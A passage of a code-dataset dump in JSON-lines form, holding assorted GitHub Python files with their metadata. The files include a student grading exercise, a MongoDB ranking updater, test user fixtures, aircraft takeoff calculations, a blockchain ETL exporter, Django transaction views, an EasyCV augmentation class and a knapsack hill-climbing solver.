print(f'obtener_mejor_estudiante: {mejor}')\n if mejor == mejor_correcto:\n print('Mejor estudiante correcto!')\n else:\n print(f'ERROR, mejor estudiante esperado: {mejor_correcto}')\n # salvar datos en archivo\n evaluador.salvar_datos(nombre_archivo)\n if comparar_archivo_notas(nombre_archivo):\n print('Generacion de archivo correcta')\n else:\n print('Generacion de archivos incorrecta, ver archivo \"ejemplo_notas.csv\"')\n\n #Correo: eduardo.laruta+tareas@gmail.com\n #Dos correos\n #1 Infografia_1_Michel","repo_name":"Bussy888/Infografia-2023","sub_path":"Ejercicio1/estudiantes.py","file_name":"estudiantes.py","file_ext":"py","file_size_in_byte":5322,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"37814673947","text":"import sys\nimport time\nimport backend_mongo as mo\n\n\nusers, tradeables, logs, webapp_current_ranking = mo.login()\n\n\ndef user_generator(umid_list):\n for umid in umid_list:\n yield mo.User(umid)\n\n\ndef get_rankings():\n print(f'{time.strftime(\"%M:%S\", time.gmtime())} ranking')\n \"\"\" future feature: to get one class' ranking - change umid_list to match for ID list instead of finding all \"\"\"\n ledger = []\n umid_list = [x['UMID'] for x in users.find({}, {\"_id\": 0, \"UMID\": 1})]\n\n # generate the ledger from list of UMIDs\n for user in user_generator(umid_list):\n ledger.append(dict(UMID=user.umid, name=user.name, balance=user.balance))\n\n # sort the ledger by balance\n ledger = sorted(ledger, key=lambda k: float(k['balance'].replace(',', '')))[::-1]\n\n # add rank to each\n for k, i in enumerate(ledger):\n ledger[k]['rank'] = k + 1\n\n # purge rankings and insert new data\n print(f'{time.strftime(\"%M:%S\", time.gmtime())} db update')\n webapp_current_ranking.delete_many({\"UMID\": {\"$nin\": [umid_list]}}) # delete those no longer in the ledger\n webapp_current_ranking.insert_many(ledger)\n print(f'{time.strftime(\"%M:%S\", time.gmtime())} complete')\n return True\n\n\ndef update_log(text, comment=''):\n logs.update_one(\n {\"service\": 'backend_updater'},\n {\"$push\": {\n 'history': {\n '$each': [f'{time.strftime(\"%b %d, %Y %H:%M\", time.localtime())} :: {text} :: {comment}'],\n '$position': 0\n }\n }},\n upsert=True\n )\n\n\nif __name__ == \"__main__\":\n try:\n get_rankings()\n update_log('Rankings Complete')\n except Exception as err:\n print(err)\n update_log(err, '')\n finally:\n sys.exit()\n","repo_name":"nconnector/portfolio-management-simulator","sub_path":"backend/backend_ranking.py","file_name":"backend_ranking.py","file_ext":"py","file_size_in_byte":1798,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"9304743915","text":"\"\"\"\nDicts for each test user. A function to create them.\n\"\"\"\n\nimport datetime\nimport logging\n\nfrom terraintracker.models.user import User\n\nlogger = logging.getLogger(__name__)\n\nTEST_USER_PASSWORD = 'Test1234'\n\n\ndef create_test_user(user_dict):\n u = User(_id=user_dict['id'], name=user_dict['phone'], _is_test_user=True)\n u.password = TEST_USER_PASSWORD\n u.role = User.Role.tower.value\n u.active = True\n for k in user_dict.keys():\n setattr(u, k, user_dict[k])\n u.update_position(user_dict['last_lat_seen'], user_dict['last_long_seen'])\n logger.debug(\"created test user: {}\".format(User.query.get(u.id)))\n return u\n\n\n# Eligible users is 5 users near each otherlike:\n# o\n# o o o\n# o\n# Left and right are very far apart.\n\nELIGIBLE_USERS = [\n {\n 'phone': '1111111111',\n 'id': 'test_left',\n 'last_long_seen': '-81.333583',\n 'last_lat_seen': '31.252527',\n },\n {\n 'phone': '222222222',\n 'id': 'test_right',\n 'last_long_seen': '-81.120793',\n 'last_lat_seen': '31.242464',\n },\n {\n 'phone': '3333333333',\n 'id': 'test_top',\n 'last_long_seen': '-81.206815',\n 'last_lat_seen': '31.327326',\n },\n {\n 'phone': '4444444444',\n 'id': 'test_bottom',\n 'last_long_seen': '-81.198940',\n 'last_lat_seen': '31.202165',\n },\n {\n 'phone': '5555555555',\n 'id': 'test_middle',\n 'last_long_seen': '-81.198062',\n 'last_lat_seen': '31.254075',\n },\n]\n\n# For each requestor, which eligible users should they request?\nEXPECTED_REQUESTEE_IDS_BY_REQUESTOR = {\n\n # Middle reaches everything but itself\n 'test_middle': set([u['id'] for u in ELIGIBLE_USERS if u['id'] != 'test_middle']),\n\n # Left and right are very far apart, so they won't grab each other\n 'test_left': set([u['id'] for u in ELIGIBLE_USERS if u['id'] not in ['test_left', 'test_right']]),\n 'test_right': set([u['id'] for u in ELIGIBLE_USERS if u['id'] not in ['test_left', 'test_right']]),\n\n # Top and bottom are close to each other. Reach everything but themselves\n 'test_top': set([u['id'] for u in ELIGIBLE_USERS if u['id'] != 'test_top']),\n 'test_bottom': set([u['id'] for u in ELIGIBLE_USERS if u['id'] != 'test_bottom']),\n 'test_not_active': set(),\n}\n\n\nLONELY_USER = {\n 'phone': '7777777778',\n 'id': 'test_far_away',\n 'last_lat_seen': '-31.254075',\n 'last_long_seen': ' 81.198062',\n 'active': False}\n\nINACTIVE_USER = {\n 'phone': '7777777777',\n 'id': 'test_not_active',\n 'last_lat_seen': '31.254075',\n 'last_long_seen': '-81.198062',\n 'active': False}\n\n\nINELIGIBLE_USERS = [LONELY_USER, INACTIVE_USER]\n\n\n# === Data for test_get_most_recent_user_by_phone === #\n# The code below is deprecated:\nPHONE_TEST_USER_NEWEST = {\n 'id': 'phone_test_user_newest',\n 'last_time_seen': datetime.datetime.now(),\n 'phone': '8888888888'}\n\nPHONE_TEST_USER_OLDEST = {\n 'id': 'phone_test_user_oldest',\n 'last_time_seen': datetime.datetime.now() - datetime.timedelta(days=1),\n 'phone': '9999999999'}\n\nPHONE_TEST_USER_NO_LAST_SEEN = {\n 'id': 'phone_test_user_no_last_seen',\n 'phone': '0000000000'}\n\nUSERS_SHARING_PHONE = [PHONE_TEST_USER_NEWEST, PHONE_TEST_USER_OLDEST, PHONE_TEST_USER_NO_LAST_SEEN]\n\nALL_USERS = ELIGIBLE_USERS + INELIGIBLE_USERS + USERS_SHARING_PHONE\n","repo_name":"AdamBSteele/BoatTowing","sub_path":"web/terraintracker/tests/data/user_test_data.py","file_name":"user_test_data.py","file_ext":"py","file_size_in_byte":3376,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"15192887515","text":"from numbers import Real\nfrom typing import Callable\n\ntry:\n from constants import (\n MASS_NO_CHARGE_KG,\n MAX_TAKEOFF_TIME_SEC,\n TAKE_OFF_VELOCITY_MPS,\n ENGINES_FORCE_NEWTON,\n VELOCITY_0_MPS,\n )\nexcept ImportError:\n from backend.constants import (\n MASS_NO_CHARGE_KG,\n MAX_TAKEOFF_TIME_SEC,\n TAKE_OFF_VELOCITY_MPS,\n ENGINES_FORCE_NEWTON,\n VELOCITY_0_MPS,\n )\n\nminimal_acceleration = TAKE_OFF_VELOCITY_MPS / MAX_TAKEOFF_TIME_SEC\nmaximal_total_mass = ENGINES_FORCE_NEWTON / minimal_acceleration\nmaximal_charge_mass = maximal_total_mass - MASS_NO_CHARGE_KG\n\n\nclass ChargeMassErrorTooBig(ValueError):\n pass\n\n\nclass InvalidChargeMass(ValueError):\n pass\n\n\ndef is_valid_charge_mass(charge_mass_kg) -> bool:\n \"\"\"Check if the charge mass is valid.\"\"\"\n return isinstance(charge_mass_kg, Real) and charge_mass_kg >= 0\n\n\ndef is_valid_charge_mass_string(charge_mass_kg_str: str) -> bool:\n \"\"\"Check if the charge mass is valid.\"\"\"\n try:\n charge_mass_kg = float(charge_mass_kg_str)\n except ValueError:\n return False\n return is_valid_charge_mass(charge_mass_kg)\n\n\ndef check_charge_mass_input(func: Callable):\n \"\"\" A decorator Check if the charge mass input to the function is valid.\n If not, raise an InvalidChargeMass exception.\"\"\"\n\n def wrapper(*args, **kwargs):\n charge_mass_kg = kwargs[\"charge_mass_kg\"] if \"charge_mass_kg\" in kwargs else args[0]\n if not is_valid_charge_mass(charge_mass_kg):\n raise InvalidChargeMass(\"The charge mass must be a non-negative number.\")\n return func(*args, **kwargs)\n\n return wrapper\n\n\ndef check_charge_mass_too_big(func: Callable):\n \"\"\"A decorator that checks if the charge mass is too big.\"\"\"\n\n def wrapper(*args, **kwargs):\n charge_mass_kg = kwargs[\"charge_mass_kg\"] if \"charge_mass_kg\" in kwargs else args[0]\n if charge_mass_kg > maximal_charge_mass:\n raise ChargeMassErrorTooBig(\"The charge mass is too big.\")\n return func(*args, **kwargs)\n\n return wrapper\n\n\n@check_charge_mass_input\n@check_charge_mass_too_big\ndef calculate_acceleration(charge_mass_kg: Real) -> Real:\n \"\"\"Calculate the acceleration of the plane with a given charge mass.\n Raises:\n InvalidChargeMass: if the charge mass is not a non-negative number.\"\"\"\n total_mass_kg = charge_mass_kg + MASS_NO_CHARGE_KG\n return ENGINES_FORCE_NEWTON / total_mass_kg\n\n\n@check_charge_mass_input\n@check_charge_mass_too_big\ndef calculate_takeoff_time(charge_mass_kg: Real) -> Real:\n \"\"\"Gets the mass of the charge in kilograms (non-negative number).\n Calculate the time it takes to take off with the charge mass.\n Raises:\n ChargeMassErrorTooBig if the plane can't take off in MAX_TAKEOFF_TIME_SEC.\n InvalidChargeMass: if the charge mass is not a non-negative number.\"\"\"\n acceleration_mps2 = calculate_acceleration(charge_mass_kg)\n takeoff_time_sec = TAKE_OFF_VELOCITY_MPS / acceleration_mps2\n if takeoff_time_sec > MAX_TAKEOFF_TIME_SEC:\n raise ChargeMassErrorTooBig(\"The plane will not take off in time.\")\n return takeoff_time_sec\n\n\n@check_charge_mass_input\n@check_charge_mass_too_big\ndef calculate_takeoff_distance(charge_mass_kg: Real) -> Real:\n \"\"\"Gets the mass of the charge in kilograms (non-negative number).\n Calculate the distance it takes to take off with a given charge mass.\n raises ValueError if the plane can't take off in MAX_TAKEOFF_TIME_SEC.\n Raises:\n ChargeMassErrorTooBig: if the plane can't take off in MAX_TAKEOFF_TIME_SEC.\n InvalidChargeMass: if the charge mass is not a non-negative number.\n \"\"\"\n acceleration_mps2 = calculate_acceleration(charge_mass_kg)\n takeoff_time_sec = calculate_takeoff_time(charge_mass_kg)\n return (VELOCITY_0_MPS * takeoff_time_sec) + (acceleration_mps2 * takeoff_time_sec ** 2) / 2\n\n\n@check_charge_mass_input\ndef calculate_mass_to_destroy(charge_mass_kg: Real) -> Real:\n \"\"\"Gets the mass of the charge in kilograms (non-negative number).\n If the plane can take off in time,\n You don't need to destroy any charge, so the function returns 0.\n Else, the function returns the mass of the charge that you need to destroy\n in order to take off in time.\n Raises:\n InvalidChargeMass: if the charge mass is not a non-negative number.\"\"\"\n if charge_mass_kg <= maximal_charge_mass:\n # you don't need to destroy any charge\n return 0\n return charge_mass_kg - maximal_charge_mass\n\n\ndef main():\n \"\"\"The service where the user enters the charge mass in kilograms.\n If the charge mass is not a non-negative number, the user will be asked to enter it again.\n If the charge mass is too big for the plane to take off in time,\n the user will be asked to destroy some charge mass in order to take off in time.\n Else:\n The service will print the time and distance it takes to take off with the charge mass.\"\"\"\n charge_mass_kg_str = input(\"Enter the charge mass in kg: \")\n while not is_valid_charge_mass_string(charge_mass_kg_str):\n print(\"The charge mass must be positive.\")\n charge_mass_kg_str = input(\"Enter the charge mass in kg: \")\n\n charge_mass_kg = float(charge_mass_kg_str)\n\n try:\n takeoff_time_sec = calculate_takeoff_time(charge_mass_kg)\n print(f\"The plane will take off in {takeoff_time_sec} seconds.\")\n takeoff_distance_m = calculate_takeoff_distance(charge_mass_kg)\n print(f\"The plane will take off {takeoff_distance_m} meters.\")\n except ChargeMassErrorTooBig:\n print(\"The plane will not take off in time.\")\n print(f\"In order to take off in time, you need to destroy\"\n f\" {calculate_mass_to_destroy(charge_mass_kg)} kg of charge.\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"yonikremer/golden_route","sub_path":"backend/business_logic.py","file_name":"business_logic.py","file_ext":"py","file_size_in_byte":5833,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"12148636123","text":"import logging\nimport click\n\nfrom blockchainetl.cli.utils import pick_random_provider_uri, evm_chain_options\nfrom blockchainetl.streaming.streamer import Streamer\nfrom blockchainetl.thread_local_proxy import ThreadLocalProxy\nfrom blockchainetl.enumeration.entity_type import EntityType, parse_entity_types\nfrom blockchainetl.jobs.exporters.postgres_item_exporter import PostgresItemExporter\nfrom blockchainetl.jobs.exporters.converters import NanToNoneItemConverter\nfrom blockchainetl.streaming import postgres_utils\nfrom ethereumetl.streaming.eth_token_balance_adapter import EthTokenBalanceAdapter\nfrom ethereumetl.streaming.postgres_tables import (\n TOKEN_HISTORY_BALANCES,\n TOKEN_LATEST_BALANCES,\n)\nfrom ethereumetl.streaming.postgres_hooks import upsert_latest_balances\nfrom ethereumetl.providers.auto import get_provider_from_uri\n\n\n@click.command(context_settings=dict(help_option_names=[\"-h\", \"--help\"]))\n@evm_chain_options\n@click.option(\n \"-l\",\n \"--last-synced-block-file\",\n required=True,\n show_default=True,\n envvar=\"BLOCKCHAIN_ETL_LAST_SYNCFILE\",\n help=\"The file used to store the last synchronized block file\",\n)\n@click.option(\n \"--lag\",\n default=20,\n show_default=True,\n type=int,\n help=\"The number of blocks to lag behind the network.\",\n)\n@click.option(\n \"-p\",\n \"--provider-uri\",\n show_default=True,\n type=str,\n envvar=\"BLOCKCHAIN_ETL_PROVIDER_URI\",\n help=\"The URI of the JSON-RPC's provider.\",\n)\n@click.option(\n \"--target-db-url\",\n type=str,\n default=\"postgresql://postgres:root@127.0.0.1:5432/postgres\",\n show_default=True,\n envvar=\"BLOCKCHAIN_ETL_PG_URL\",\n help=\"The target Postgres connection url\",\n)\n@click.option(\n \"-s\",\n \"--start-block\",\n default=None,\n show_default=True,\n type=int,\n help=\"Start block, included\",\n)\n@click.option(\n \"-e\",\n \"--end-block\",\n default=None,\n show_default=True,\n type=int,\n help=\"End block, included\",\n)\n@click.option(\n \"-E\",\n \"--entity-types\",\n default=EntityType.TOKEN_LATEST_BALANCE,\n show_default=True,\n type=str,\n help=\"The list of entity types to export.\",\n)\n@click.option(\n \"--period-seconds\",\n default=120,\n show_default=True,\n type=int,\n help=\"How many seconds to sleep between syncs\",\n)\n@click.option(\n \"--rpc-batch-size\",\n default=10,\n show_default=True,\n type=int,\n help=\"How many query items are carried in a JSON RPC request, \"\n \"the JSON RPC Server is required to support batch requests\",\n)\n@click.option(\n \"--export-batch-size\",\n default=50,\n show_default=True,\n type=int,\n help=\"How many items are carried in a PostgreSQL exporting transaction\",\n)\n@click.option(\n \"-B\",\n \"--block-batch-size\",\n default=100,\n show_default=True,\n type=int,\n help=\"How many blocks of raw data are extracted at a single time\",\n)\n@click.option(\n \"--rpc-max-workers\",\n default=10,\n show_default=True,\n type=int,\n help=\"The number of RPC workers\",\n)\n@click.option(\n \"--export-max-workers\",\n default=4,\n show_default=True,\n type=int,\n help=\"The number of exporting workers\",\n)\n@click.option(\n \"--print-sql\",\n is_flag=True,\n show_default=True,\n help=\"Print SQL or not\",\n)\n@click.option(\n \"--token-cache-path\",\n type=click.Path(exists=False, readable=True, dir_okay=True, writable=True),\n show_default=True,\n help=\"The path to store token's attributes\",\n)\n@click.option(\n \"--token-address\",\n type=str,\n show_default=True,\n multiple=True,\n help=\"Only run this token address(es)\",\n)\n@click.option(\n \"--exporter-is-multiprocess\",\n is_flag=True,\n show_default=True,\n help=\"PostgresItemExporter use multiprocess\",\n)\n@click.option(\n \"--read-block-from-target\",\n is_flag=True,\n show_default=True,\n help=\"Read block data from target database\",\n)\n@click.option(\n \"--read-log-from\",\n type=click.Choice([\"rpc\", \"source\"]),\n default=\"rpc\",\n show_default=True,\n help=\"(EXPERIMENTAL) Read logs from rpc or source database\",\n)\n@click.option(\n \"--source-db-url\",\n type=str,\n default=None,\n show_default=True,\n help=\"The source GreenPlum/Postgres connection url\",\n)\n@click.option(\n \"--async-enrich-balance\",\n is_flag=True,\n show_default=True,\n help=\"(EXPERIMENTAL) Async enrich balances, fill in balances from onchain rpc\",\n)\n@click.option(\n \"--async-enrich-redis-url\",\n type=str,\n default=\"redis://@127.0.0.1:6379/4\",\n show_default=True,\n envvar=\"BLOCKCHAIN_ETL_ENRICH_BALANCE_REDIS_URL\",\n help=\"The Redis conneciton url used to store the enrich-balance tasks\",\n)\ndef export_balance(\n chain,\n last_synced_block_file,\n lag,\n provider_uri,\n target_db_url,\n start_block,\n end_block,\n entity_types,\n period_seconds,\n rpc_batch_size,\n export_batch_size,\n block_batch_size,\n rpc_max_workers,\n export_max_workers,\n print_sql,\n token_cache_path,\n token_address,\n exporter_is_multiprocess,\n read_block_from_target,\n read_log_from,\n source_db_url,\n async_enrich_balance,\n async_enrich_redis_url,\n):\n \"\"\"Export History/Latest balances from RPC into PostgreSQL database\"\"\"\n\n if provider_uri is None:\n raise click.BadParameter(\n \"-p/--provider-uri or $BLOCKCHAIN_ETL_PROVIDER_URI is required\"\n )\n\n entity_types = parse_entity_types(entity_types, ignore_unknown=True)\n provider_uri = pick_random_provider_uri(provider_uri)\n logging.info(\"Using provider: \" + provider_uri)\n\n history_balances_stmt = postgres_utils.create_insert_statement_for_table(\n table=TOKEN_HISTORY_BALANCES,\n on_conflict_do_update=False,\n schema=chain,\n )\n latest_balances_stmt = postgres_utils.create_insert_statement_for_table(\n table=TOKEN_LATEST_BALANCES,\n on_conflict_do_update=True,\n upsert_callback=upsert_latest_balances(),\n where_callback=postgres_utils.cond_upsert_on_blknum,\n schema=chain,\n )\n\n item_exporter = PostgresItemExporter(\n target_db_url,\n chain,\n item_type_to_insert_stmt_mapping={\n EntityType.TOKEN_HISTORY_BALANCE: history_balances_stmt,\n EntityType.TOKEN_LATEST_BALANCE: latest_balances_stmt,\n },\n converters=(NanToNoneItemConverter(),),\n print_sql=print_sql,\n workers=export_max_workers,\n pool_size=export_max_workers,\n pool_overflow=export_max_workers + 10,\n batch_size=export_batch_size,\n multiprocess=exporter_is_multiprocess,\n )\n\n streamer_adapter = EthTokenBalanceAdapter(\n batch_web3_provider=ThreadLocalProxy(\n lambda: get_provider_from_uri(provider_uri, batch=True)\n ),\n target_db_url=target_db_url,\n target_dbschema=chain,\n item_exporter=item_exporter,\n chain=chain,\n entity_types=entity_types,\n batch_size=rpc_batch_size,\n max_workers=rpc_max_workers,\n token_cache_path=token_cache_path,\n token_addresses=token_address,\n read_block_from_target=read_block_from_target,\n read_log_from=read_log_from,\n async_enrich_balance=async_enrich_balance,\n async_enrich_redis_url=async_enrich_redis_url,\n source_db_url=source_db_url,\n )\n\n streamer = Streamer(\n blockchain_streamer_adapter=streamer_adapter,\n last_synced_block_file=last_synced_block_file,\n lag=lag,\n start_block=start_block,\n end_block=end_block,\n period_seconds=period_seconds,\n block_batch_size=block_batch_size,\n )\n streamer.stream()\n","repo_name":"jsvisa/blockchain-etl","sub_path":"blockchainetl/cli/export_balance.py","file_name":"export_balance.py","file_ext":"py","file_size_in_byte":7622,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"60"} +{"seq_id":"18463540085","text":"# views.py\n# from django.shortcuts import render\nfrom django.shortcuts import get_object_or_404\n\n# from rest_framework import viewsets\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom rest_framework.pagination import PageNumberPagination\n\nfrom .serializers import UserinfoSerializer, TransactionSerializer\nfrom .models import UserInfo, Transaction\nfrom UTD.utd import UniqueTransactionDetect\n\nutd = UniqueTransactionDetect()\n\n# Create your views here.\nclass UserInfoViewAPI(APIView):\n # APIView\n def get(self, request, pk=None):\n paginator = PageNumberPagination()\n paginator.page_size = 3\n\n try:\n # UserInfo 테이블의 사용자 테이블과 역참조로 해당 pk의 Transaction 테이블도 가져옴\n user_info = get_object_or_404(UserInfo.objects.prefetch_related('transaction'), pk=pk)\n # transaction 역참조 데이터를 Paginator를 사용하여 페이지별로 가져오기\n paginated_queryset = paginator.paginate_queryset(user_info.transaction.all(), request)\n\n # Serializer에 넣기\n transaction_serializer = TransactionSerializer(paginated_queryset, many=True, context={\"request\": request})\n userinfo_serializer = UserinfoSerializer(user_info, context={'request': request})\n\n return Response({\"result\": {\n 'userinfo': userinfo_serializer.data, \\\n 'transaction': paginator.get_paginated_response(transaction_serializer.data).data, \\\n }, \"error\": None}, status=status.HTTP_200_OK)\n\n except UserInfo.DoesNotExist:\n # url이 잘못 됬을때(user_info 에 없는 UID)\n return Response({\"result\": None, \"error\": \"No UID matches the given query.\"}, \\\n status=status.HTTP_404_NOT_FOUND)\n\n except Exception as e:\n # 기타 예외 처리\n return Response({\"result\": None, \"error\": str(e)}, \\\n status=status.HTTP_500_INTERNAL_SERVER_ERROR)\n\n\n def post(self, request, pk=None):\n serializer = TransactionSerializer(data=request.data)\n if serializer.is_valid():\n # serializer.save()\n\n # 해당 User 데이터 가져오기\n try:\n tran_use = UserInfo.objects.filter(uid=pk).values()[0]\n except UserInfo.DoesNotExist:\n # serializer 형식 및 url이 잘못 됬을때(user_info 에 없는 UID)\n return Response({\"result\": None, \"error\": \"No UID matches the given query.\"},\n status=status.HTTP_404_NOT_FOUND)\n\n # 거래유형\n result = utd.predict_result(serializer.data)\n if type(result) is dict:\n # 데이터 형식이 잘못 됬을때\n return Response({\"result\": None, \"error\": result},\n status=status.HTTP_400_BAD_REQUEST)\n\n # 특이거래 여부\n if tran_use[result] != 0:\n detection_result = False\n else:\n detection_result = True\n\n # UserInfo 업데이트\n tran_use[result] = tran_use[result]+1\n get_uid = UserInfo.objects.get(uid=pk)\n\n get_uid.c1 = tran_use[\"c1\"]\n get_uid.c2 = tran_use[\"c2\"]\n get_uid.c3 = tran_use[\"c3\"]\n get_uid.c4 = tran_use[\"c4\"]\n get_uid.c5 = tran_use[\"c5\"]\n get_uid.c6 = tran_use[\"c6\"]\n get_uid.c7 = tran_use[\"c7\"]\n get_uid.c8 = tran_use[\"c8\"]\n get_uid.c9 = tran_use[\"c9\"]\n get_uid.c10 = tran_use[\"c10\"]\n get_uid.c11 = tran_use[\"c11\"]\n get_uid.c12 = tran_use[\"c12\"]\n get_uid.save()\n\n # Transaction 추가\n Transaction.objects.create(bas_ym=serializer.data['bas_ym'], \\\n age_dc=serializer.data['age_dc'], \\\n gender=serializer.data['gender'], \\\n bas_dt=serializer.data['bas_dt'], \\\n tran_md=serializer.data['tran_md'], \\\n ats_kdcd_dtl=serializer.data['ats_kdcd_dtl'], \\\n dps_trn_am=serializer.data['dps_trn_am'], \\\n text_1=serializer.data['text_1'], \\\n user_info_uid=get_uid, \\\n result=result)\n\n # 정상 작동\n return Response({\"result\": detection_result, \"error\": None}, status=status.HTTP_201_CREATED)\n\n else:\n # key나 value가 잘못 됬을때(serializer)\n return Response({\"result\": None, \"error\": serializer.errors}, status=status.HTTP_400_BAD_REQUEST)\n","repo_name":"whfh3900/real","sub_path":"api/un_tran_report/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"22460993061","text":"import warnings\nfrom copy import deepcopy\n\nimport mmcv\n\nfrom easycv.datasets.registry import PIPELINES\nfrom easycv.datasets.shared.pipelines import Compose\n\n\n@PIPELINES.register_module()\nclass MultiScaleFlipAug3D(object):\n \"\"\"Test-time augmentation with multiple scales and flipping.\n\n Args:\n transforms (list[dict]): Transforms to apply in each augmentation.\n img_scale (tuple | list[tuple]: Images scales for resizing.\n pts_scale_ratio (float | list[float]): Points scale ratios for\n resizing.\n flip (bool, optional): Whether apply flip augmentation.\n Defaults to False.\n flip_direction (str | list[str], optional): Flip augmentation\n directions for images, options are \"horizontal\" and \"vertical\".\n If flip_direction is list, multiple flip augmentations will\n be applied. It has no effect when ``flip == False``.\n Defaults to \"horizontal\".\n pcd_horizontal_flip (bool, optional): Whether apply horizontal\n flip augmentation to point cloud. Defaults to True.\n Note that it works only when 'flip' is turned on.\n pcd_vertical_flip (bool, optional): Whether apply vertical flip\n augmentation to point cloud. Defaults to True.\n Note that it works only when 'flip' is turned on.\n \"\"\"\n\n def __init__(self,\n transforms,\n img_scale,\n pts_scale_ratio,\n flip=False,\n flip_direction='horizontal',\n pcd_horizontal_flip=False,\n pcd_vertical_flip=False):\n self.transforms = Compose(transforms)\n self.img_scale = img_scale if isinstance(img_scale,\n list) else [img_scale]\n self.pts_scale_ratio = pts_scale_ratio \\\n if isinstance(pts_scale_ratio, list) else [float(pts_scale_ratio)]\n\n assert mmcv.is_list_of(self.img_scale, tuple)\n assert mmcv.is_list_of(self.pts_scale_ratio, float)\n\n self.flip = flip\n self.pcd_horizontal_flip = pcd_horizontal_flip\n self.pcd_vertical_flip = pcd_vertical_flip\n\n self.flip_direction = flip_direction if isinstance(\n flip_direction, list) else [flip_direction]\n assert mmcv.is_list_of(self.flip_direction, str)\n if not self.flip and self.flip_direction != ['horizontal']:\n warnings.warn(\n 'flip_direction has no effect when flip is set to False')\n if (self.flip and not any([(t['type'] == 'RandomFlip3D'\n or t['type'] == 'RandomFlip')\n for t in transforms])):\n warnings.warn(\n 'flip has no effect when RandomFlip is not in transforms')\n\n def __call__(self, results):\n \"\"\"Call function to augment common fields in results.\n\n Args:\n results (dict): Result dict contains the data to augment.\n\n Returns:\n dict: The result dict contains the data that is augmented with\n different scales and flips.\n \"\"\"\n aug_data = []\n\n # modified from `flip_aug = [False, True] if self.flip else [False]`\n # to reduce unnecessary scenes when using double flip augmentation\n # during test time\n flip_aug = [True] if self.flip else [False]\n pcd_horizontal_flip_aug = [False, True] \\\n if self.flip and self.pcd_horizontal_flip else [False]\n pcd_vertical_flip_aug = [False, True] \\\n if self.flip and self.pcd_vertical_flip else [False]\n for scale in self.img_scale:\n for pts_scale_ratio in self.pts_scale_ratio:\n for flip in flip_aug:\n for pcd_horizontal_flip in pcd_horizontal_flip_aug:\n for pcd_vertical_flip in pcd_vertical_flip_aug:\n for direction in self.flip_direction:\n # results.copy will cause bug\n # since it is shallow copy\n _results = deepcopy(results)\n _results['scale'] = scale\n _results['flip'] = flip\n _results['pcd_scale_factor'] = \\\n pts_scale_ratio\n _results['flip_direction'] = direction\n _results['pcd_horizontal_flip'] = \\\n pcd_horizontal_flip\n _results['pcd_vertical_flip'] = \\\n pcd_vertical_flip\n data = self.transforms(_results)\n aug_data.append(data)\n # list of dict to dict of list\n aug_data_dict = {key: [] for key in aug_data[0]}\n for data in aug_data:\n for key, val in data.items():\n aug_data_dict[key].append(val)\n return aug_data_dict\n\n def __repr__(self):\n \"\"\"str: Return a string that describes the module.\"\"\"\n repr_str = self.__class__.__name__\n repr_str += f'(transforms={self.transforms}, '\n repr_str += f'img_scale={self.img_scale}, flip={self.flip}, '\n repr_str += f'pts_scale_ratio={self.pts_scale_ratio}, '\n repr_str += f'flip_direction={self.flip_direction})'\n return repr_str\n","repo_name":"alibaba/EasyCV","sub_path":"easycv/datasets/detection3d/pipelines/test_aug.py","file_name":"test_aug.py","file_ext":"py","file_size_in_byte":5463,"program_lang":"python","lang":"en","doc_type":"code","stars":1565,"dataset":"github-code","pt":"60"} +{"seq_id":"5849890837","text":"mes1= 31\nmes2= 28\nmes3= 30\n\ndiaMes=[31,28,31,30,31,30,31,31,30,31,30,31]\nn = input (\"¿como te llamas? \")\nprint(\"hola, \",n)\n\nstrEdad= input(\"¿que edad tienes? \")\nstrYear= input(\"¿en que años estamos?\")\nstrMes= input(\"¿en que mes estamos?\")\nstrDia= input(\"¿en que día estamos\")\n\nedad=int(strEdad)\nyear=int(strYear)\nmes= int (strMes)\ndia= int (strDia)\n\nindice= 0\ntranscurrido=0\n\n\nwhile indice < mes-1:\n transcurrido = transcurrido + diaMes[indice]\n indice= indice + 1 \n \n\ntranscurrido += dia\n \nprob = (transcurrido / 365) * 100\n\nnacimiento = year - edad\n\nprint (n, \"nacistes en \" , nacimiento, \" con una probabilidad de:\", prob)\n\nprint (\" o en \", nacimiento -1, \" con una probabilidad del \", 100-prob) \n \n \n ","repo_name":"jorgesanme/Python","sub_path":"Ejercicios/keepcoding/nombre.py","file_name":"nombre.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"31354375233","text":"#generador de variables random\nimport random\n\n# Función evaluar calcula el valor total de los objetos seleccionados y compara si el peso total de estos no supera el peso total máximo\ndef evaluate(items, knapsack_weight, solution):\n total_value = 0 #inicializamo el valor\n total_weight = 0 #inicializamos peso\n for i in range(len(items)): #seleccion de los objetos\n if solution[i] == 1: # itera sobre la lista \"solution\" y, para cada elemento de la lista, se comprueba si la solución correspondiente para ese objeto es 1.\n total_value += items[i][0] \n total_weight += items[i][1]\n if total_weight > knapsack_weight: # si el peso total es mayor que el de la mochila se devuelve una lista con dos valores: 0 y el peso total. \n return [0, total_weight] \n else:\n return (total_value, total_weight)\n \n\n# Función vecino: genera una solución vecina a la sol actual,\ndef generate_neighbor(solution):\n neighbor = solution[:] # primero crea una copia de la solución dada y la almacena en una nueva lista llamada \"neighbor\"\n i = random.randint(0, len(solution)-1) # se selecciona un índice al azar en la lista \"solution\" utilizando la función \"random.randint\" de la biblioteca \"random\".\n neighbor[i] = 1 - neighbor[i] # el valor en la posición seleccionada se invierte, cambiando de 0 a 1 o de 1 a 0, y se devuelve la lista \"neighbor\".\n return neighbor\n\n# Inicializar la solución: inicializa la solucion al azar\ndef initialize_solution(n):\n return [random.randint(0,1) for i in range(n)]\n\n#Algoritmo de Hill climbing: genera soluciones vecinas, evaluza las puntuaciones y act la sol actual si encuentra una sol vecina mejor.\ndef hill_climbing(items, knapsack_weight, n_iter):\n current_solution = initialize_solution(len(items))\n current_value, total_weight = evaluate(items, knapsack_weight, current_solution) #obtener la 